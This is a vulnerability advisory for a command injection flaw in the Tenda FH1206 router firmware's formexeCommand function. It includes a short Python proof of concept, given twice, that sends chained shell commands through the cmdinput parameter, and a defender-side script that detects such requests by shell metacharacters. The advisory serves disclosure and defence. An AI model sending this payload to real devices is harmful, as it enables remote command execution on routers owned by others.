[ Discoverer: ta0lve ]
Tenda FH1206 V1.2.0.8(8155)
V1.2.0.8(8155)
The Tenda FH1206 V1.2.0.8(8155) has a command injection vulnerability located in the `formexeCommand` function. The `src` variable receives the `cmdinput` parameter from a POST request and is later assigned to the `v7` variable, which is directly used in the `doSystemCmd` function, causing arbitrary command execution. The user-provided `cmdinput` can trigger this security vulnerability.
# formexeCommand_RCE
```python
import requests

ip = '192.168.0.100:80'
url = f"http://{ip}/goform/exeCommand"
# cmdinput reaches doSystemCmd unmodified
data = {'cmdinput': 'echo \'hack!!!\';ls;'}
ret = requests.post(url, data)
```
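A defender-side check for this request pattern, as an added example (not code from the advisory or from Tenda): it parses captured HTTP requests and flags any that send `cmdinput` to `/goform/exeCommand`, noting shell metacharacters. The function name, the metacharacter set and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter named in the advisory.
ENDPOINT = "/goform/exeCommand"
PARAM = "cmdinput"
# Assumed set of characters that let a shell chain or substitute commands.
SHELL_META = re.compile(r"[;&|`$<>\n\\'\"(){}]")

def inspect_request(raw: bytes):
    """Return a finding for a raw HTTP/1.x request, or None if it is unrelated."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) != 3:
        return None
    method, target, _version = parts
    url = urlsplit(target)
    # Case-insensitive match is a conservative choice, not a claim about the router.
    if url.path.rstrip("/").lower() != ENDPOINT.lower():
        return None
    # The parameter may arrive in the query string or the form body; check both.
    fields = parse_qs(url.query, keep_blank_values=True)
    for key, vals in parse_qs(body.decode("latin-1"), keep_blank_values=True).items():
        fields.setdefault(key, []).extend(vals)
    values = fields.get(PARAM, [])
    if not values:
        return None
    meta = sorted({c for v in values for c in SHELL_META.findall(v)})
    # Per the advisory every cmdinput value reaches doSystemCmd, so any hit
    # deserves review; metacharacters additionally indicate command chaining.
    return {"method": method, "values": values, "metachars": meta, "chained": bool(meta)}

# Constructed sample requests (not captured traffic).
SAMPLES = [
    b"POST /goform/exeCommand HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"cmdinput=echo+%27test%27%3Bls%3B",
    b"POST /goform/exeCommand HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\ncmdinput=ping",
    b"GET /index.html HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_request(sample))
```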
### Vulnerability type
CWE-94
Improper Control of Generation of Code ('Code Injection')
Remote Code Execution (RCE)
### Vendor of the product(s)
Tenda FH1206 V1.2.0.8(8155)
### Product_version
Tenda FH1206
V1.2.0.8(8155)
### Attack type
Remote
### Affected_component
The "formexeCommand" function of /bin/httpd
### Attack_vector
Use a simple exploit to attack, like this:
```python
#python3
import requests

ip = '192.168.0.100:80'
url = f"http://{ip}/goform/exeCommand"
# cmdinput reaches doSystemCmd unmodified
data = {'cmdinput': 'echo \'hack!!!\';ls;'}
ret = requests.post(url, data)
```
### Description
Tenda FH1206 V1.2.0.8(8155) was discovered to contain a command injection vulnerability via the cmdinput parameter at ip/goform/formexeCommand.
### Reference
<https://palm-vertebra-fe9.notion.site/formexeCommand_RCE-91a5f12ae23a42b4a25f5d1d4de308da>
<https://www.tendacn.com/hk/download/detail-2344.html>